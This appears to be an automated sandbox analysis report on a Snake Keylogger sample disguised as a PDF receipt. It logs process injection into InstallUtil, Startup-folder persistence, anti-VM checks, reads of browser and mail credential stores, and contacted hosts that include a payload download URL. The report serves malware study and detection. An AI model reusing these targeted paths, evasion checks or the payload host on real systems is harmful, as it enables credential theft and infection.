Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595124	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595007	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594562	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Thread delayed: delay time: 99875	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Thread delayed: delay time: 99765	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Thread delayed: delay time: 99653	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Thread delayed: delay time: 99532	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Thread delayed: delay time: 99422	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Thread delayed: delay time: 99305	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Thread delayed: delay time: 99124	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Thread delayed: delay time: 99015	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Thread delayed: delay time: 98904	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Thread delayed: delay time: 98797	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Thread delayed: delay time: 98688	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Thread delayed: delay time: 98563	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Thread delayed: delay time: 98438	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Thread delayed: delay time: 98328	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Thread delayed: delay time: 98219	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Thread delayed: delay time: 98094	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Thread delayed: delay time: 97985	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Thread delayed: delay time: 97860	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Thread delayed: delay time: 97735	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Thread delayed: delay time: 97610	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Thread delayed: delay time: 97495	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Thread delayed: delay time: 97375	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Thread delayed: delay time: 97266	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Thread delayed: delay time: 97141	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Thread delayed: delay time: 97032	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Thread delayed: delay time: 96907	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Thread delayed: delay time: 96766	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Thread delayed: delay time: 96616	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Thread delayed: delay time: 96497	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Thread delayed: delay time: 96375	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Thread delayed: delay time: 96266	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Thread delayed: delay time: 96157	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599893	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599768	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599643	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599518	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599393	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599268	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599143	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599018	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598893	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598768	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598643	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598518	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598393	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598268	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598143	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598018	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597893	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597768	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597643	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597518	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597393	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597268	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597143	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597018	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596893	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596768	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596643	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596518	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596393	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596268	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596143	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596018	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595893	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595768	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595643	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595518	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595393	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595268	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595143	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595018	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594893	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594768	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594643	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594503	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594356	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594249	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594034	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 593909	Jump to behavior

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior

Source: InstallUtil.exe, 00000007.00000002.2931667024.0000000001468000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlls
Source: Id.exe, 00000004.00000002.1927771292.0000000002F8C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SerialNumber0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: Id.exe, 00000004.00000002.1927771292.0000000002F8C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: dekont_001.pdf.exe, 00000000.00000002.1760452399.000000000124F000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2931823377.0000000001024000.00000004.00000020.00020000.00000000.sdmp, Id.exe, 00000004.00000002.1927050504.0000000001389000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\dekont_001.pdf.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 1_2_06647D90 LdrInitializeThunk,

1_2_06647D90

Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\dekont_001.pdf.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\Id.exe "C:\Users\user\AppData\Roaming\Id.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Queries volume information: C:\Users\user\Desktop\dekont_001.pdf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Queries volume information: C:\Users\user\AppData\Roaming\Id.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\dekont_001.pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 0.2.dekont_001.pdf.exe.3e49550.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.dekont_001.pdf.exe.3e49550.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1768060486.0000000003E48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2933316783.000000000332D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1927771292.000000000339C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1761092855.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1946252341.0000000003FC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2934160902.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2930601192.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2933316783.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1768060486.0000000003EC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2934160902.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dekont_001.pdf.exe PID: 6968, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 732, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Id.exe PID: 2188, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 4192, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

Source: Yara match	File source: 0.2.dekont_001.pdf.exe.3e49550.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.dekont_001.pdf.exe.3e49550.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1768060486.0000000003E48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1927771292.000000000339C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1761092855.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1946252341.0000000003FC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2930601192.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1768060486.0000000003EC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dekont_001.pdf.exe PID: 6968, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 732, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Id.exe PID: 2188, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 4192, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 0.2.dekont_001.pdf.exe.3e49550.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.dekont_001.pdf.exe.3e49550.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1768060486.0000000003E48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2933316783.000000000332D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1927771292.000000000339C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1761092855.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1946252341.0000000003FC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2934160902.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2930601192.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2933316783.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1768060486.0000000003EC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2934160902.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dekont_001.pdf.exe PID: 6968, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 732, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Id.exe PID: 2188, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 4192, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	Valid Accounts	1 Scheduled Task/Job	111 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	11 Process Injection	12 Obfuscated Files or Information	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Software Packing	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Registry Run Keys / Startup Folder	2 Registry Run Keys / Startup Folder	1 DLL Side-Loading	NTDS	21 Security Software Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Masquerading	LSA Secrets	1 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	31 Virtualization/Sandbox Evasion	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Process Injection	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
dekont_001.pdf.exe	29%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
dekont_001.pdf.exe	100%	Avira	HEUR/AGEN.1308518
dekont_001.pdf.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\Id.exe	100%	Avira	HEUR/AGEN.1308518
C:\Users\user\AppData\Roaming\Id.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Id.exe	29%	ReversingLabs	ByteCode-MSIL.Trojan.Generic

Source	Detection	Scanner	Label
http://checkip.dyndns.org/	0%	URL Reputation	safe
https://stackoverflow.com/q/14436606/23354	0%	URL Reputation	safe
https://stackoverflow.com/q/11564914/23354;	0%	URL Reputation	safe
https://stackoverflow.com/q/2152978/23354	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
http://reallyfreegeoip.org	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
http://checkip.dyndns.com	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
erkasera.com	188.132.193.46	true	false	unknown
reallyfreegeoip.org	188.114.97.3	true	true	unknown
checkip.dyndns.com	158.101.44.242	true	false	unknown
checkip.dyndns.org	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://erkasera.com/seuias/Mfevxcugo.dat	false		unknown
https://reallyfreegeoip.org/xml/173.254.250.81	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://erkasera.com	dekont_001.pdf.exe, 00000000.00000002.1761092855.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, Id.exe, 00000004.00000002.1927771292.0000000002F41000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://github.com/mgravell/protobuf-neti	dekont_001.pdf.exe, 00000000.00000002.1772053391.0000000006B60000.00000004.08000000.00040000.00000000.sdmp	false		unknown
